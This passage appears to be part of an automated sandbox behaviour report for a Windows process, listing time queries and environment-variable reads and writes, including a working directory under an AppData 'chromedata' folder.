System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:34:15 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11093652 |
|
1 | |
| Get Time | type = Performance Ctr, time = 32381713498 |
|
1 |
Environment (19)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
